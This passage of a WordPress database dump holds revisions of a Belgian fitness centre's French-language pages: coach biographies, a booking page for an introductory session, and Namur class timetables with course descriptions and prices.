/></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n        <li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n\r\n\r\n\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALLUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-02-17 17:59:59', '2014-02-17 17:59:59', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(435, 1, '2014-02-17 17:57:25', '2014-02-17 17:57:25', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n        <li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALLUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-02-17 17:57:25', '2014-02-17 17:57:25', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(440, 1, '2014-08-31 07:39:13', '2014-08-31 07:39:13', '<blockquote>\r\n<h1>Prise de RDV pour une séance booster :</h1>\r\n</blockquote>\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une séance Booster. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre séance booster.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2014-08-31 07:39:13', '2014-08-31 07:39:13', '', 266, 'http://www.crosstrainingcenter.be/266-revision-v1/', 0, 'revision', '', 0),
(441, 1, '2014-08-31 07:41:25', '2014-08-31 07:41:25', '<blockquote>\r\n<h1>Prise de RDV pour une séance booster :</h1>\r\n</blockquote>\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une séance Booster. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre séance booster.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance booster', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2014-08-31 07:41:25', '2014-08-31 07:41:25', '', 266, 'http://www.crosstrainingcenter.be/266-revision-v1/', 0, 'revision', '', 0),
(445, 1, '2014-08-31 07:59:59', '2014-08-31 07:59:59', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1></h1>\r\n<h2>Réservation des séances :</h2>\r\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/contact/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-08-31 07:59:59', '2014-08-31 07:59:59', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(442, 1, '2014-08-31 07:56:06', '2014-08-31 07:56:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Small Group Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 pers.). Nous vous proposons 7 types de séances décrites ci-dessous.\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une <a title=\"Séance booster\" href=\"http://www.crosstrainingcenter.be/266-2/\">séance Booster</a>. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre 